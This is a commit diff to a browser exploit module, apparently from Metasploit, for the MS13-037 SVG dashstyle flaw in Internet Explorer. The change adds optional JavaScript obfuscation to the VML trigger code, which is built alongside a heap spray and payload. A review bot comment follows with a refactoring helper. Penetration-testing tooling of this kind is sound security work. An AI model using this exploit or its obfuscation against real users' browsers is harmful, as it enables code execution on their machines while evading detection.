
Commit a1c7961

author
jvazquez-r7
committed
Support js obfuscation for the trigger
1 parent 5240c6e commit a1c7961


1 file changed

+53
-24
lines changed

1 file changed

+53
-24
lines changed

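--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -201,19 +201,7 @@ def load_exploit_html(my_target, cli)
 p = get_payload(my_target, cli)
 js = ie_heap_spray(my_target, p)
 
-html = %Q|
-<html>
-<head>
-<script>
-#{js}
-</script>
-<meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
-</head>
-<title>
-</title>
-<style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
-<xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
-<script>
+js_trigger = %Q|
 var rect_array = new Array()
 var a = new Array()
 
@@ -247,29 +235,47 @@ def load_exploit_html(my_target, cli)
 location.reload();
 
 }
-</script>
-<body onload="createRects(); exploit();">
-<v:oval>
-<v:stroke id="vml1"/>
-</v:oval>
-</body>
-</html>
 |
 
-return html
-end
+create_rects_func = "createRects"
+exploit_func = "exploit"
+
+if datastore['OBFUSCATE']
+js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
+js_trigger.obfuscate
+create_rects_func = js_trigger.sym("createRects")
+exploit_func = js_trigger.sym("exploit")
+end
 
-def html_info_leak
 html = %Q|
 <html>
 <head>
+<script>
+#{js}
+</script>
 <meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
 </head>
 <title>
 </title>
 <style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
 <xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
 <script>
+#{js_trigger}
+</script>
+<body onload="#{create_rects_func}(); #{exploit_func}();">
+<v:oval>
+<v:stroke id="vml1"/>
+</v:oval>
+</body>
+</html>
+|
+
+return html
+end
+
+def html_info_leak
+
+js_trigger = %Q|
 var rect_array = new Array()
 var a = new Array()
 
@@ -314,8 +320,31 @@ def html_info_leak
 }
 
 }
+|
+
+create_rects_func = "createRects"
+exploit_func = "exploit"
+
+if datastore['OBFUSCATE']
+js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
+js_trigger.obfuscate
+create_rects_func = js_trigger.sym("createRects")
+exploit_func = js_trigger.sym("exploit")
+end
+
+html = %Q|
+<html>
+<head>
+<meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
+</head>
+<title>
+</title>
+<style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
+<xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
+<script>
+#{js_trigger}
 </script>
-<body onload="createRects(); exploit();">
+<body onload="#{create_rects_func}(); #{exploit_func}();">
 <v:oval>
 <v:stroke id="vml1"/>
 </v:oval>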
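Review bot: The OBFUSCATE handling added at new lines 240–248 of load_exploit_html is repeated verbatim at new lines 325–333 of html_info_leak, together with the `create_rects_func`/`exploit_func` defaults, so the two trigger pages will drift the moment the symbol names or the obfuscator call change; one private helper returning the trigger and the two function names removes the duplication. The helper would also make the type change explicit: after the `if`, `js_trigger` is no longer a String but a JSObfu object that is only usable because `#{js_trigger}` calls its `to_s`, which is easy to miss when reading either method on its own. `datastore['OBFUSCATE']` is read but not registered anywhere in this diff; presumably the HttpServer::HTML mixin declares the option, which is worth confirming since an unregistered option reads as nil and the unobfuscated branch is taken silently. The rendered page strips indentation, so the layout of the new blocks cannot be checked here.
```ruby
# Returns [trigger_js, create_rects_name, exploit_name]. When OBFUSCATE is set the
# names are the renamed symbols, so the onload handler still resolves them.
def prepare_trigger(js_trigger)
  return [js_trigger, "createRects", "exploit"] unless datastore['OBFUSCATE']

  obfu = ::Rex::Exploitation::JSObfu.new(js_trigger)
  obfu.obfuscate
  [obfu, obfu.sym("createRects"), obfu.sym("exploit")]
end

# … unchanged: in load_exploit_html and html_info_leak, after the js_trigger heredoc …
js_trigger, create_rects_func, exploit_func = prepare_trigger(js_trigger)
```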
